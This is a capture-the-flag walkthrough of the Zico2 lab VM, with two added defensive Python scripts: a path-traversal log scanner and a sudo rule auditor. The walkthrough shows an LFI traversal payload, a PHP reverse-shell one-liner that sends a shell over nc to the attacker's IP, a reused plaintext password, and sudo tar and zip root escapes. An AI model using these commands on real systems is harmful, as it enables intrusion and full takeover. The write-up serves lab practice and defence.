Link: https://www.vulnhub.com/entry/zico2-1,210/
Initial foothold
1. Network discovery
nmap -sn 10.0.2.32/24
My target is 10.0.2.38.
2. Port scan
nmap -Pn 10.0.2.38
nmap -Pn -p1000- 10.0.2.38
There are 4 open ports: 22, 80, 111, and 57516.
3. OS and service scan
nmap -A -p22,80,111,57516 10.0.2.38
4. Vuln scan
nmap --script vuln -p22,80,111,57516 10.0.2.38
Service Enumeration
1. SSH port 22
Initial connection
ssh 10.0.2.38
There is no banner.
2. HTTP port 80
Nikto scan
nikto -h http://10.0.2.38
There are interesting directories, as listed in the snapshot.
Directory scan
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.38/ -x php,txt,html,sh,cgi -q
Access HTTP site
Viewing the page source revealed a possible LFI vulnerability.
Verify it
Intercept w/ Burp Suite and send to the Repeater
Test for LFI by editing the highlighted string of the request.
../../../../../etc/passwd
Success!!!
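As an added, defender-side example (not from the original write-up): a small Python script that scans web server access log lines for the kind of traversal request shown above. It decodes URL encoding before matching, so `..%2F` and double-encoded variants are caught as well as the plain `../` form. The log lines and the `view.php?page=` parameter name are constructed for the example, not taken from the target.

```python
import re
from urllib.parse import unquote

# Constructed Apache-style access log lines for the example; the vulnerable
# parameter name (view.php?page=) is an assumption, not taken from the target.
SAMPLE_LOG = """\
10.0.2.32 - - [01/Jan/2024:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512
10.0.2.32 - - [01/Jan/2024:10:00:01 +0000] "GET /view.php?page=tools.html HTTP/1.1" 200 1024
10.0.2.32 - - [01/Jan/2024:10:00:02 +0000] "GET /view.php?page=../../../../../etc/passwd HTTP/1.1" 200 1420
10.0.2.32 - - [01/Jan/2024:10:00:03 +0000] "GET /view.php?page=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1420
10.0.2.32 - - [01/Jan/2024:10:00:04 +0000] "GET /view.php?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 210
"""

# Common log format: client, ident, user, [timestamp], "METHOD target PROTO", status, size
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# Indicators of directory traversal, checked after decoding
TRAVERSAL_RE = re.compile(r'\.\.[/\\]|/etc/passwd', re.IGNORECASE)


def fully_decode(value, max_rounds=3):
    """Undo URL encoding repeatedly (bounded) so double-encoded payloads are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_traversal(log_text):
    """Return one dict per request whose decoded target looks like path traversal."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        match = REQUEST_RE.match(line)
        if not match:
            continue  # skip lines that are not in common log format
        client, method, target, status = match.groups()
        decoded = fully_decode(target)
        if TRAVERSAL_RE.search(decoded):
            hits.append({"line": number, "client": client, "method": method,
                         "target": decoded, "status": int(status)})
    return hits


if __name__ == "__main__":
    for hit in find_traversal(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['client']} {hit['method']} {hit['target']} -> {hit['status']}")
```

The status code is kept in each hit on purpose: a traversal request answered with 200 means the server most likely served the file, while a 404 only records the attempt.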
Accessing other directories from the scan result, I came across /dbadmin, which contains phpLiteAdmin v1.9.3.
I googled it and came across this exploit guide.
3. RPCBind port 111
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.0.2.38
Exploitation
1. Access the test_users database. I got credentials of root and zico.
2. Crack hashes w/ crackstation.
3. Use the cracked hashes to log in w/ ssh
ssh root@10.0.2.38
ssh zico@10.0.2.38
Failed!
4. Exploit phpLiteAdmin
I will follow the exploitation guide.
Create New Database as ‘hack.php’
Create new table
Supply reverse shell command using this guide
I used this command and saved it as TEXT
<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.2.32 443 >/tmp/f");?>
File ‘hack.php’ will be stored in ‘/use/database/hack.php’
Prepare reverse shell listener on port 443
rlwrap nc -lvp 443
Access it w/ the LFI vulnerability that I discovered.
Back to the listener, I got the shell
NOTE: Before I got the shell, I tried many commands. If you don't have the shell yet, just keep trying.
Privilege Escalation
1. Upgrade to a TTY shell
python -c 'import pty;pty.spawn("/bin/bash");'
2. Explore directories
cd /var/www
ls -la
Nothing useful
cd /home
ls -la
cd zico
ls -la
There’s a Wordpress directory
cd wordpress
cat wp-config.php
Now I got zico's MySQL credentials.
Some people re-use their credentials. I'll try them to log in as zico.
su zico
password: sWfCsfJSPV9H3AmQzw8
Now I'm zico. Next, verify the sudo permissions
sudo -l
I have 2 methods to escalate my privileges to root.
Starting w/ tar, I used this guide.
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
whoami
cd /root
ls -la
cat flag.txt
Now I’m root.
Another method is zip
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
whoami
Now, I’m root.
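As an added example on the defender side (not part of the original write-up): a Python audit of `sudo -l` output that flags rules like the tar and zip ones above, where a binary that can hand the caller a shell is runnable as root without a password. The sample output is constructed in the shape the write-up describes; the host name and the Defaults lines are assumptions, and the set of flagged binaries is kept to the two the write-up demonstrates so you can extend it for your own environment.

```python
import re

# Constructed sample of `sudo -l` output matching the situation in the write-up
# (tar and zip runnable as root with NOPASSWD); host name and Defaults are assumed.
SAMPLE_SUDO_L = """\
Matching Defaults entries for zico on zico:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User zico may run the following commands on zico:
    (root) NOPASSWD: /bin/tar
    (root) NOPASSWD: /usr/bin/zip
"""

# Binaries the write-up shows breaking out to a root shell; extend with your own list
SHELL_ESCAPE_BINARIES = {"tar", "zip"}

# A rule line looks like: "    (root) NOPASSWD: /bin/tar" or "    (ALL : ALL) ALL"
RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$')


def parse_sudo_l(text):
    """Turn the rule lines of `sudo -l` output into dicts (runas, nopasswd, command)."""
    rules = []
    for line in text.splitlines():
        match = RULE_RE.match(line)
        if not match:
            continue  # header, Defaults and blank lines carry no rule
        runas = match.group("runas").split(":")[0].strip()  # "(root : root)" -> "root"
        tags = {t.rstrip(":") for t in match.group("tags").split()}
        for command in match.group("cmds").split(","):
            rules.append({"runas": runas,
                          "nopasswd": "NOPASSWD" in tags,
                          "command": command.strip()})
    return rules


def audit_rules(rules):
    """Flag rules that let the caller escape to a shell or run arbitrary commands."""
    findings = []
    for rule in rules:
        command, runas = rule["command"], rule["runas"]
        binary = "ALL" if command == "ALL" else command.split()[0].rsplit("/", 1)[-1]
        reasons = []
        if command == "ALL":
            reasons.append("any command allowed")
        elif binary in SHELL_ESCAPE_BINARIES:
            reasons.append(f"{binary} can break out to an interactive shell")
        if "*" in command:
            reasons.append("wildcard in command path or arguments")
        if not reasons:
            continue
        # Root without a password is the worst case; anything else still deserves review
        severity = "HIGH" if runas in ("root", "ALL") and rule["nopasswd"] else "MEDIUM"
        findings.append({"command": command, "runas": runas,
                         "severity": severity, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in audit_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"[{finding['severity']}] ({finding['runas']}) {finding['command']}: "
              + "; ".join(finding["reasons"]))
```

The fix on the host is the mirror image of the finding: remove the tar and zip entries from sudoers, or restrict them to exact argument lists that cannot include the checkpoint-action or test-command options used above.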